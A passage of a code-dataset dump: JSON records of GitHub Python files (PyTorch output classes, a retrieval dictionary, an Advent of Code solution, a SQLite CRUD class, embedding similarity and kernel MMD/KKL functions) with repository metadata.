"coin_price.get_p2p_price", "line_number": 22, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 23, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 24, "usage_type": "call"}, {"api_name": "coin_price.get_p2p_price", "line_number": 25, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 28, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 29, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 30, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 31, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 32, "usage_type": "call"}, {"api_name": "prettytable.PrettyTable", "line_number": 51, "usage_type": "call"}, {"api_name": "table.add_row", "line_number": 56, "usage_type": "call"}, {"api_name": "time.time", "line_number": 61, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 77, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 91, "usage_type": "call"}, {"api_name": "coin_price.get_coin_price", "line_number": 92, "usage_type": "call"}]} +{"seq_id": "71191851367", "text": "import torch\n\n# output classes for bi-encoder and mm-encoder account for flexibility in case of additional byol or data2vec outputs\n\nclass DispatcherOutput:\n def __init__(\n self,\n student_input, \n teacher_inputs, \n align_fuse, \n apply_mask: bool, \n labels: torch.Tensor, \n output_modalities: dict, \n metric: str, \n num_classes: int,\n ) -> None:\n self.student_input = student_input\n self.teacher_inputs = teacher_inputs\n self.align_fuse = align_fuse\n self.apply_mask = apply_mask\n self.labels = labels\n self.output_modalities = output_modalities\n self.metric = metric\n self.num_classes = num_classes\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n\nclass ModelOutput:\n def __init__(\n self,\n pooler_output: torch.Tensor,\n last_hidden_state: torch.Tensor,\n hidden_states: torch.Tensor,\n attentions: torch.Tensor,\n cross_attentions: torch.Tensor \n ) -> None:\n self.pooler_output = pooler_output\n self.last_hidden_state = last_hidden_state\n self.hidden_states = hidden_states\n self.attentions = attentions\n self.cross_attentions = cross_attentions\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n \n \nclass CriterionOutput:\n def __init__(\n self,\n total_loss: torch.Tensor,\n latent_loss: torch.Tensor = None,\n align_loss: torch.Tensor = None,\n ) -> None:\n self.total_loss = total_loss\n self.latent_loss = latent_loss\n self.align_loss = align_loss\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n\n\nclass ForwardPassOutput:\n def __init__(\n self,\n student_output: ModelOutput = None,\n teacher_output: ModelOutput = None,\n align_fuse: dict = None,\n labels: torch.Tensor = None,\n output_modalities: dict = None,\n metric: str = None,\n num_classes: int = None,\n criterion_output: CriterionOutput = None,\n ) -> None:\n self.student_output = student_output\n self.teacher_output = teacher_output\n self.align_fuse = align_fuse\n self.labels = labels\n self.output_modalities = output_modalities\n self.metric = metric\n self.num_classes = num_classes,\n self.criterion_output = criterion_output\n \n def set_attributes(self, **kwargs):\n for key, value in kwargs.items():\n setattr(self, key, value)\n ", "repo_name": "marcomoldovan/multimodal-self-distillation", "sub_path": "src/models/components/outputs.py", "file_name": "outputs.py", "file_ext": "py", "file_size_in_byte": 2761, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.Tensor", "line_number": 12, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 34, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 37, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 54, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 56, "usage_type": "attribute"}, {"api_name": "torch.Tensor", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "29647903572", "text": "word = 'podaj slowo lub zdanie:'\ndict1 = dict()\n\nfor sign in word:\n dict1[sign] = dict1.get(sign, 0) + 1\n\nfor znak, ilosc in dict1.items():\n print(f'{znak} -> {ilosc}')\n\n\nfrom collections import defaultdict\nzliczenia = defaultdict(int)\nfor znak in word:\n zliczenia[znak] += 1\nprint(\"333: \", zliczenia)", "repo_name": "marcinszymura/python_kurs", "sub_path": "day3/zadanie_get_slownik.py", "file_name": "zadanie_get_slownik.py", "file_ext": "py", "file_size_in_byte": 310, "program_lang": "python", "lang": "pl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "35013439440", "text": "import requests\n\n# Specify the URL of the PDF file in the repository\npdf_url = \"https://drive.google.com/file/d/1CLl2OruM9oPscyjaBhXiUD-dfdDNYDII/view?usp=sharing\"\n\n# Send a GET request to download the PDF file\nresponse = requests.get(pdf_url)\n\n# Check if the request was successful\nif response.status_code == 200:\n # Access the PDF content\n pdf_content = response.content\n # Your code to work with the PDF content goes here\n # For example, you can save it to a local file or process it further\nelse:\n print(\"Failed to retrieve the PDF file.\")\n", "repo_name": "harithabeduduru/mounika", "sub_path": "intern.py", "file_name": "intern.py", "file_ext": "py", "file_size_in_byte": 559, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "40398157659", "text": "from typing import *\n\nimport torch\n\nfrom ncc.data import constants\nfrom ncc.data.dictionary import Dictionary\nfrom ncc.data.retrieval.word_bpe_dictionary import WordBpeDicionary\n\n\nclass HybridRetrievalDictionary(object):\n \"\"\"Hybrid retrieval dictionary, composed of subtoken and bpe dictionaries\"\"\"\n\n def __init__(self, subtoken_dict=None, bpetoken_dict=None):\n self.subtoken_dict = subtoken_dict\n self._subtoken_len = 0 if self.subtoken_dict is None else len(self.subtoken_dict)\n self.bpetoken_dict = bpetoken_dict\n self._bpetoken_len = 0 if self.bpetoken_dict is None else len(self.bpetoken_dict)\n\n def __len__(self):\n return self._subtoken_len + self._bpetoken_len\n\n def __getitem__(self, idx):\n if idx < self.__len__():\n if idx < self._subtoken_len:\n return self.subtoken_dict.symbols[idx]\n elif idx < self._subtoken_len + self._bpetoken_len:\n return self.bpetoken_dict.symbols[idx - self._bpetoken_len]\n return constants.UNK\n\n def __eq__(self, other):\n return (self.subtoken_dict is not None and self.subtoken_dict.indices == other.subtoken_dict.indices) and \\\n (self.bpetoken_dict is not None and self.bpetoken_dict.indices == other.bpetoken_dict.indices)\n\n def __contains__(self, sym):\n return (self.subtoken_dict is not None and sym in self.subtoken_dict.indices) and \\\n (self.bpetoken_dict is not None and sym in self.bpetoken_dict.indices)\n\n def unk(self):\n if self.subtoken_dict:\n return self.subtoken_dict.unk()\n else:\n return None\n\n @property\n def unk_word(self):\n if self.subtoken_dict:\n return self.subtoken_dict.unk_word\n else:\n return None\n\n def pad(self):\n if self.subtoken_dict:\n return self.subtoken_dict.pad()\n else:\n return None\n\n def eow(self):\n if self.bpetoken_dict:\n return self.bpetoken_dict.eow()\n else:\n return None\n\n def sow(self):\n if self.bpetoken_dict:\n return self.bpetoken_dict.sow()\n else:\n return None\n\n @classmethod\n def load(cls, f):\n subtoken_dict = Dictionary.load(f)\n splitted_filenames = f.rsplit('.', 2)\n bpe_f = '.'.join([splitted_filenames[0], 'bpe'] + splitted_filenames[-2:])\n bpetoken_dict = WordBpeDicionary.load(bpe_f)\n return cls(subtoken_dict, bpetoken_dict)\n\n def save(self, f):\n self.subtoken_dict.save(f)\n splitted_filenames = f.rsplit('.', 2)\n bpe_f = '.'.join([splitted_filenames[0], 'bpe'] + splitted_filenames[-2:])\n self.bpetoken_dict.save(bpe_f)\n\n def index(self, word):\n if word in self.subtoken_dict:\n subtokens = [word]\n else:\n subtokens = self.bpe_tokenize(word)\n subtoken_ids = []\n for token in subtokens:\n if token in self.subtoken_dict:\n subtoken_ids.append(self.subtoken_dict.index(token))\n elif token in self.bpetoken_dict:\n subtoken_ids.append(self.bpetoken_dict.index(token) + self._subtoken_len)\n else:\n subtoken_ids.append(self.subtoken_dict.unk())\n return subtoken_ids\n\n def encode_line(\n self,\n line,\n line_tokenizer,\n func_name,\n **kwargs\n ):\n words = line_tokenizer(line, func_name=func_name, min_func_len=kwargs.get('min_func_len', None)) \\\n if line_tokenizer is not None else line\n ids = []\n for i, word in enumerate(words):\n idx = self.index(word)\n ids.extend(idx)\n ids = torch.Tensor(ids).long()\n return ids\n\n def bpe_tokenize(self, word: str) -> List[str]:\n \"\"\" Tokenizes inside an unknown token using BPE \"\"\"\n end_idx = min([len(word), self.bpetoken_dict.ngram_max])\n sw_tokens = [self.bpetoken_dict.sow_word]\n start_idx = 0\n\n while start_idx < len(word):\n subword = word[start_idx:end_idx]\n if subword in self.bpetoken_dict:\n sw_tokens.append(subword)\n start_idx = end_idx\n end_idx = min([len(word), start_idx + self.bpetoken_dict.ngram_max])\n elif len(subword) == 1:\n sw_tokens.append(self.bpetoken_dict.unk_word)\n start_idx = end_idx\n end_idx = min([len(word), start_idx + self.bpetoken_dict.ngram_max])\n else:\n end_idx -= 1\n\n sw_tokens.append(self.bpetoken_dict.eow_word)\n return sw_tokens\n", "repo_name": "CGCL-codes/naturalcc", "sub_path": "ncc/data/retrieval/hybrid/hybrid_retrieval_dictionary.py", "file_name": "hybrid_retrieval_dictionary.py", "file_ext": "py", "file_size_in_byte": 4658, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 220, "dataset": "github-code", "pt": "53", "api": [{"api_name": "ncc.data.constants.UNK", "line_number": 28, "usage_type": "attribute"}, {"api_name": "ncc.data.constants", "line_number": 28, "usage_type": "name"}, {"api_name": "ncc.data.dictionary.Dictionary.load", "line_number": 71, "usage_type": "call"}, {"api_name": "ncc.data.dictionary.Dictionary", "line_number": 71, "usage_type": "name"}, {"api_name": "ncc.data.retrieval.word_bpe_dictionary.WordBpeDicionary.load", "line_number": 74, "usage_type": "call"}, {"api_name": "ncc.data.retrieval.word_bpe_dictionary.WordBpeDicionary", "line_number": 74, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 111, "usage_type": "call"}]} +{"seq_id": "252430878", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nSolution for day 08 2017\n\"\"\"\n\n__author__ = 'Guido Minieri'\n__license__ = 'GPL'\n\n\nwith open('input.txt', 'r') as f:\n data = f.read().splitlines()\n\nfrom collections import defaultdict as dd\nimport operator as o\n\nregs = dd(int)\n\noperators = {\n \">\": o.gt,\n \"<\": o.lt,\n \"==\": o.eq,\n \">=\": o.ge,\n \"<=\": o.le,\n \"!=\": o.ne\n}\n\nmaxes = []\n\ndef parseInst(instruction):\n oper, condition = instruction.split(' if ')\n target, operator, t_val = condition.split()\n reg, cmd, val = oper.split()\n return (reg, cmd, int(val),target, operator, int(t_val))\n\ndef command(reg, cmd, val):\n if cmd == \"inc\":\n regs[reg] += val\n else:\n regs[reg] -= val\n maxes.append(regs[reg])\n\nfor inst in data:\n reg, cmd, val, target, op, t_val = parseInst(inst)\n if operators[op](regs[target], t_val):\n command(reg, cmd, val)\n\nprint(max(regs.values()))\nprint(max(maxes))\n", "repo_name": "gmnr/advent-of-code", "sub_path": "2017/08/day08.py", "file_name": "day08.py", "file_ext": "py", "file_size_in_byte": 952, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.defaultdict", "line_number": 18, "usage_type": "call"}, {"api_name": "operator.gt", "line_number": 21, "usage_type": "attribute"}, {"api_name": "operator.lt", "line_number": 22, "usage_type": "attribute"}, {"api_name": "operator.eq", "line_number": 23, "usage_type": "attribute"}, {"api_name": "operator.ge", "line_number": 24, "usage_type": "attribute"}, {"api_name": "operator.le", "line_number": 25, "usage_type": "attribute"}, {"api_name": "operator.ne", "line_number": 26, "usage_type": "attribute"}]} +{"seq_id": "14711535962", "text": "import os\n\nimport dotenv\n\ndotenv.load_dotenv()\n\n\nclass Config:\n def __init__(self) -> None:\n self.debug_mode = False\n self.openai_api_key = os.getenv(\"OPENAI_API_KEY\", \"\")\n self.node_red_server = os.getenv(\"NODE_RED_SERVER\", \"\")\n self.fast_llm_model = os.getenv(\"FAST_LLM_MODEL\", \"gpt-3.5-turbo\")\n self.smart_llm_model = os.getenv(\"SMART_LLM_MODEL\", \"gpt-4\")\n self.temperature = float(os.getenv(\"TEMPERATURE\", \"1\"))\n\n assert self.openai_api_key != \"\", \"OpenAI API key not found\"\n", "repo_name": "viact-ai/automate_chatgpt_nodered", "sub_path": "utils/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 531, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 5, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 14, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "20366125819", "text": "\"\"\"\r\nImplementación de las operaciones CRUD (Create - Read - Update - Delete)\r\nCon SQLite3\r\n\"\"\"\r\n\r\nimport sqlite3 as dbapi\r\nfrom os.path import isfile\r\nfrom base_datos_objetos import Empleado, Categoria, Producto\r\n\r\nclass BaseDatos:\r\n \"\"\"\r\n Representa la conexión a la base de datos y define las operaciones CRUD (Create - Read - Update - Delete)\r\n para una entidad\r\n \"\"\"\r\n\r\n def __init__(self, path):\r\n self.conexion=None\r\n self.cur = None\r\n\r\n if not isfile(path):\r\n raise ValueError('El '+path+' no existe...')\r\n\r\n else:\r\n self.conexion=dbapi.connect(path)\r\n self.cur = self.conexion.cursor()\r\n\r\n def create(self, empleado):\r\n \"\"\"\r\n Da de alta un empleado en la base de datos\r\n \"\"\"\r\n sql = \"insert into empleados(id,nombre, cargo) values(?,?,?)\"\r\n t = empleado.getTupla()\r\n return self.__actualizar(sql, t)\r\n\r\n def delete(self, id):\r\n \"\"\"\r\n Borra un empleado por clave primaria\r\n \"\"\"\r\n sql = \"delete from empleados where id=?\"\r\n t = (id,) \r\n return self.__actualizar(sql, t)\r\n\r\n def update(self, empleado):\r\n \"\"\"\r\n Actualiza un empleado de la base de datos\r\n \"\"\"\r\n sql = \"update empleados set nombre=?, cargo=? where id=?\"\r\n t = empleado.getTupla2()\r\n return self.__actualizar(sql, t)\r\n\r\n def __actualizar(self, sql, t):\r\n \"\"\"\r\n Ejecuta una consulta de acción dentro de una trasacción\r\n \"\"\"\r\n try:\r\n self.cur.execute(sql, t)\r\n n = self.cur.rowcount\r\n self.conexion.commit()\r\n return n\r\n\r\n except Exception as e:\r\n self.conexion.rollback()\r\n raise e\r\n\r\n def read(self, id):\r\n \"\"\"\r\n Devuelve un empleado de la base de datos\r\n \"\"\"\r\n sql = \"select * from empleados where id=?\"\r\n self.cur.execute(sql, (id,))\r\n t = self.cur.fetchone()\r\n if not t:\r\n raise ValueError('El id '+str(id)+ ' no existe en la base de datos')\r\n else:\r\n return Empleado(*t)\r\n\r\n def selectEmpleados(self, cargo=None):\r\n \"\"\"\r\n Devuelve una colección de objetos empleado\r\n \"\"\"\r\n empleados = []\r\n sql = \"select id,nombre,cargo from empleados\"\r\n if not cargo: \r\n self.cur.execute(sql)\r\n else:\r\n sql += \" where cargo like ?\"\r\n self.cur.execute(sql, (\"%\"+cargo+\"%\",))\r\n\r\n for t in self.cur.fetchall():\r\n empleado = Empleado(*t)\r\n empleados.append(empleado)\r\n return empleados\r\n\r\n def query(self, sql):\r\n self.cur.execute(sql)\r\n cabs = \";\".join([t[0] for t in self.cur.description])\r\n print(cabs)\r\n for t in self.cur.fetchall():\r\n linea = \";\".join([str(col) for col in t]) \r\n print(linea)\r\n\r\n def __del__(self):\r\n if self.cur: self.cur.close()\r\n if self.conexion: self.conexion.close()\r\n\r\nif __name__ == '__main__':\r\n try:\r\n bd = BaseDatos(\"../bd/empresa3.db\")\r\n #bd.query(\"select * from pedidos\")\r\n empleados = bd.selectEmpleados('ventas')\r\n for e in empleados:\r\n print(e)\r\n\r\n empleado = bd.read(4)\r\n print(empleado)\r\n empleado.cargo = \"Gerente de ventas\"\r\n bd.update(empleado)\r\n\r\n emp = bd.read(4)\r\n print(emp)\r\n\r\n #empleado = Empleado(50, \"Sandra Gonzalez\", \"Directivo de ventas\")\r\n #bd.create(empleado)\r\n\r\n \"\"\"\r\n if bd.delete(1):\r\n print('Registro borrado')\r\n else:\r\n print('No se ha podido eliminar')\r\n \"\"\"\r\n\r\n except Exception as e:\r\n print(e)\r\n", "repo_name": "aldebarran22/curso_santander_1", "sub_path": "codigo_feb_1/conexion_basedatos.py", "file_name": "conexion_basedatos.py", "file_ext": "py", "file_size_in_byte": 3782, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 20, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 24, "usage_type": "call"}, {"api_name": "base_datos_objetos.Empleado", "line_number": 75, "usage_type": "call"}, {"api_name": "base_datos_objetos.Empleado", "line_number": 90, "usage_type": "call"}]} +{"seq_id": "5457451761", "text": "from typing import Iterable, List, Tuple, NamedTuple, Union, Optional, Dict\n\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom . import Embeddings\n\n\nclass EmbeddingSimilarity(NamedTuple):\n rank: int\n word: str\n similarity: float\n vec: np.ndarray\n\n\nMostSimilarResult = List[EmbeddingSimilarity]\nWordOrVec = Union[str, np.ndarray]\n\n\nclass Matrix:\n \"\"\" Transforms a lookup-based Embeddings object into a classical embedding matrix by looking up a fixed vocabulary\n and storing the results. The matrix can then be used for distance measuring.\n \"\"\"\n\n def __init__(self, lookup_embeddings: Embeddings, vocab: Optional[Iterable[str]] = None,\n precomputed_word2ind: Optional[Dict[str, int]] = None, precomputed_matrix: Optional[np.ndarray] = None,\n verbose: bool = False) -> None:\n \"\"\" Initialize the Matrix object.\n\n :param lookup_embeddings: the embeddings object used for lookup\n :param vocab: an iterable containing the words that should be stored in the matrix\n :param precomputed_word2ind: a precomputed word2ind dict, e.g. from the fastText .vec file\n :param precomputed_matrix: a precomputed embedding matrix, e.g. from the fastText .vec file\n :param verbose: setting this to True will show a progress bar when first looking up embeddings as well as output\n means when computing distances\n \"\"\"\n self.verbose = verbose\n self.lookup_embeddings = lookup_embeddings\n\n if vocab is not None:\n self._init_from_vocab(lookup_embeddings, vocab=vocab)\n elif precomputed_word2ind is not None and precomputed_matrix is not None:\n self._init_from_word2ind_and_matrix(precomputed_word2ind, precomputed_matrix)\n else:\n raise ValueError('The Matrix needs to be initialized either with vocab or word2ind+matrix')\n\n def _init_from_vocab(self, lookup_embeddings, vocab):\n vocab = set(vocab)\n self.vocab_size = len(vocab)\n self.word2ind = {word: i for i, word in enumerate(vocab)}\n self.ind2word = {i: word for i, word in enumerate(vocab)}\n self.embedding_matrix = np.zeros((self.vocab_size, lookup_embeddings.size))\n self.is_norm = False\n\n items: Iterable[Tuple[str, int]] = self.word2ind.items()\n if self.verbose:\n items = tqdm(items, desc='Looking up embeddings')\n for word, ind in items:\n looked_up = lookup_embeddings.lookup(word)\n if np.count_nonzero(looked_up) > 0:\n self.embedding_matrix[ind] = looked_up\n else:\n # this shouldn't happen anymore\n raise RuntimeError(f'Embedding vector for {word} is all zeros')\n\n def _init_from_word2ind_and_matrix(self, word2ind, matrix):\n self.vocab_size = len(word2ind)\n self.word2ind = word2ind\n self.ind2word = {i: word for word, i in self.word2ind.items()}\n self.embedding_matrix = matrix\n self.is_norm = True\n\n def init_norms(self, force: bool = False) -> None:\n \"\"\" Initializes self.norms with pre-computed L2 normalized vectors for cosine distance computation.\n\n :param force: setting this to True will update the norms even if they were already computed\n :return: None\n \"\"\"\n if not self.is_norm or force:\n # noinspection PyAttributeOutsideInit\n self.embedding_matrix = self.embedding_matrix / np.sqrt((self.embedding_matrix ** 2).sum(-1))[\n ..., np.newaxis]\n self.is_norm = True\n\n def _most_similar_cosine_measurement(self, vec):\n self.init_norms()\n normalized_vec = vec / np.linalg.norm(vec)\n return np.dot(self.embedding_matrix, normalized_vec)\n\n def most_similar_cosine(self, word_or_vec: WordOrVec, n: int = 20) -> MostSimilarResult:\n \"\"\" Calculate the cosine distance of the input vector to all vectors in the embedding matrix and return the\n most similar ones.\n\n :param word_or_vec: the input word or vector\n :param n: the number of results to return, or None if all should be returned\n :return: a list of MostSimilarResult objects\n \"\"\"\n return self._generic_most_similar(word_or_vec, self._most_similar_cosine_measurement,\n higher_is_more_similar=True, n=n)\n\n def cosine_distance_rank(self, word_or_vec: WordOrVec, word):\n return self._generic_rank(word_or_vec, word, self._most_similar_cosine_measurement, higher_is_more_similar=True)\n\n def cosine_distance(self, vec: np.ndarray, word: str) -> float:\n \"\"\" Returns the cosine distance between an input word and vector.\n\n :param vec: the input vector\n :param word: the input word\n :return: a float between -1 and 1\n \"\"\"\n self.init_norms()\n normalized_vec = vec / np.linalg.norm(vec)\n return float(np.dot(self.embedding_matrix[self.word2ind[word]], normalized_vec))\n\n def most_similar_l2(self, word_or_vec: WordOrVec, n: int = 20) -> MostSimilarResult:\n \"\"\" Calculate the L2 norm distance of the input vector to all vectors in the embedding matrix and return the\n most similar ones.\n\n :param word_or_vec: the input word or vector\n :param n: the number of results to return, or None if all should be returned\n :return: a list of (word, distance) pairs, with lower distance meaning more similar\n \"\"\"\n\n def measurement(vec):\n distances = np.zeros(self.vocab_size)\n for i, emb in enumerate(self.embedding_matrix):\n distances[i] = np.linalg.norm(vec - emb)\n return distances\n\n return self._generic_most_similar(word_or_vec, measurement, higher_is_more_similar=False, n=n)\n\n def _lookup_if_needed(self, word_or_vec: WordOrVec) -> np.ndarray:\n if type(word_or_vec) == str:\n return self.lookup_embeddings.lookup(word_or_vec)\n else:\n return word_or_vec\n\n def _generic_most_similar(self, word_or_vec: WordOrVec, measurement, higher_is_more_similar, n: int = 20):\n self.init_norms()\n vec = self._lookup_if_needed(word_or_vec)\n distances = measurement(vec)\n assert len(distances) == len(self.embedding_matrix)\n if self.verbose:\n print('mean distance', np.mean(distances))\n\n distances_for_sorting = -distances if higher_is_more_similar else distances\n\n if n is None or n == len(self.embedding_matrix):\n sorted_most_similar_ind = np.argsort(distances_for_sorting)\n else:\n most_similar_ind = np.argpartition(distances_for_sorting, n)[:n]\n sorted_most_similar_ind = most_similar_ind[np.argsort(distances_for_sorting[most_similar_ind])]\n\n return [EmbeddingSimilarity(rank=rank,\n word=self.ind2word[ind],\n similarity=distances[ind],\n vec=self.embedding_matrix[ind])\n for rank, ind in enumerate(sorted_most_similar_ind, start=1)]\n\n def _generic_rank(self, word_or_vec: WordOrVec, word, measurement, higher_is_more_similar):\n self.init_norms()\n vec = self._lookup_if_needed(word_or_vec)\n distances = measurement(vec)\n distances = -distances if higher_is_more_similar else distances\n\n word_distance = distances[self.word2ind[word]]\n return np.count_nonzero(distances[distances < word_distance]) + 1\n", "repo_name": "maxfriedrich/deid-training-data", "sub_path": "deid/embeddings/matrix.py", "file_name": "matrix.py", "file_ext": "py", "file_size_in_byte": 7525, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 17, "dataset": "github-code", "pt": "53", "api": [{"api_name": "typing.NamedTuple", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 13, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 17, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Iterable", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.ndarray", "line_number": 26, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 52, "usage_type": "call"}, {"api_name": "typing.Iterable", "line_number": 55, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 55, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 87, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 88, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.linalg.norm", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 112, "usage_type": "attribute"}, {"api_name": "numpy.dot", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 144, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 149, "usage_type": "call"}, {"api_name": "numpy.argpartition", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.argsort", "line_number": 152, "usage_type": "call"}, {"api_name": "numpy.count_nonzero", "line_number": 167, "usage_type": "call"}]} +{"seq_id": "9922483230", "text": "import numpy as np\nimport scipy.stats as scs\nimport kernels as kl\n\n\n######## MMD ##########\n\ndef MMD(x,y,k):\n n = len(x)\n Kxx = np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Kyy = np.array([[k(y[i],y[j]) for i in range(n)] for j in range(n)])\n Kxy = np.array([[k(x[i],y[j]) for i in range(n)] for j in range(n)])\n A = 1/((n-1)*n) * (np.sum(Kxx) - np.sum(np.diag(Kxx)))\n C = 1/((n-1)*n) * (np.sum(Kyy) - np.sum(np.diag(Kyy)))\n B = 1/n**2* np.sum(Kxy)\n return A - B + C\n\n\n#gradient in x of MMD \ndef grad_MMD(x,y,k,dk):\n d = len(x[0])\n n = len(x)\n m = len(y)\n dKx = np.array([[dk(x[i],x[j]) for j in range(n)] for i in range(n)])\n dKx[:,:,0] = dKx[:,:,0] - np.diag(np.diag(dKx[:,:,0]))\n dKx[:,:,1] = dKx[:,:,1] - np.diag(np.diag(dKx[:,:,1]))\n dKy = np.array([[dk(x[i],y[j]) for j in range(m)] for i in range(n)])\n R = np.zeros((n,d))\n R[:,0] = 2/(n * (n-1)) * dKx[:,:,0] @ np.ones(n) - 2/m**2 * dKy[:,:,0] @ np.ones(m)\n R[:,1] = 2/(n * (n-1)) * dKx[:,:,1] @ np.ones(n) - 2/m**2 * dKy[:,:,1] @ np.ones(m)\n return R\n\n\n\ndef log_ou_0(t):\n t_log = np.zeros(len(t))\n for i in range(len(t)):\n if t[i] > 0:\n t_log[i] = np.log(t[i])\n return t_log\n\n\n\n\n####### KKL ########\n\n\ndef KKL(x,y,k,Packy):\n n = len(x)\n m = len(y)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Ky = Packy[0] #1/m * np.array([[k(y[i],y[j]) for i in range(m)] for j in range(m)])\n regx = 1e-9*np.eye(n)\n regy = 1e-9*np.eye(m)\n #Kx = Kx +regx\n #Ky = Ky+regy\n Lx,U = np.linalg.eig(Kx)\n U = np.real(U).transpose()\n Lx = np.real(Lx)\n Ly,V = Packy[1], Packy[2] #np.linalg.eig(Ky)\n #V = np.real(V).transpose()\n #Ly = np.real(Ly)\n Trxy = 0\n Kxy = np.array([[k(x[i],y[j]) for j in range(m)] for i in range(n)])\n Trxx = np.sum(Lx * log_ou_0(Lx))\n for s in range(n):\n for t in range(m):\n Trxy = Trxy + log_ou_0([Ly[t]])[0] / Ly[t] * (U[s] @ Kxy @ V[t])**2 \n Trxx = np.sum(Lx * log_ou_0(Lx))\n \n return Trxx - 1/(n*m) * Trxy\n\n#Wasserstein Gradient of KKL\ndef WGrad_KKL(w,x,y,k,dk,Packy):\n n = len(x)\n m = len(y)\n Kx = 1/n * np.array([[k(x[i],x[j]) for i in range(n)] for j in range(n)])\n Ky = Packy[0] #1/m * np.array([[k(y[i],y[j]) for i in range(m)] for j in range(m)])\n Lx,U = np.linalg.eig(Kx)\n U = U.transpose()\n Lx = np.real(Lx)\n Ly,V = Packy[1], Packy[2] #np.linalg.eig(Ky)\n #V = V.transpose()\n #Ly = np.real(Ly)\n Kwx = np.array([k(w,x[i]) for i in range(n)]).transpose()\n Kwy = np.array([k(w,y[j]) for j in range(m)]).transpose()\n DKx = np.array([dk(w,x[i]) for i in range(n)]).transpose()\n DKy = np.array([dk(w,y[j]) for j in range(m)]).transpose()\n Trwx = 0\n Trwy = 0 \n for s in range(n):\n Trwx = Trwx + log_ou_0([Lx[s]])[0] / Lx[s] * 2 * (U[s] @ Kwx)* (DKx @ U[s]) \n #print(U[s] @ (n * Kx) @ U[s])\n for t in range(m):\n Trwy = Trwy + log_ou_0([Ly[t]])[0] / Ly[t] * 